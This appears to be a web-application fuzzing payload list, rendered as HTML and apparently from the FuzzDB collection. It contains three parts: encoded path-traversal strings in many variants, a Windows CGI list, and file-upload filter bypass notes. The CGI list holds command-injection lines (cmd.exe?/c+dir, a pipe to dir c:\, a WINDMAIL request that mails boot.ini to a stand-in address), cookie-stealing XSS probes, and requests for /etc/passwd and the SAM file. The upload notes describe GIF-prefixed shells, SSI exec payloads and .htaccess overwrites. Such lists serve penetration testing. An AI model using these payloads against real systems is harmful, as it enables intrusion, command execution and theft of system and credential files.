%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
..0x2f{FILE}<br />
..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
..0x5c{FILE}<br />
..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010 <br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
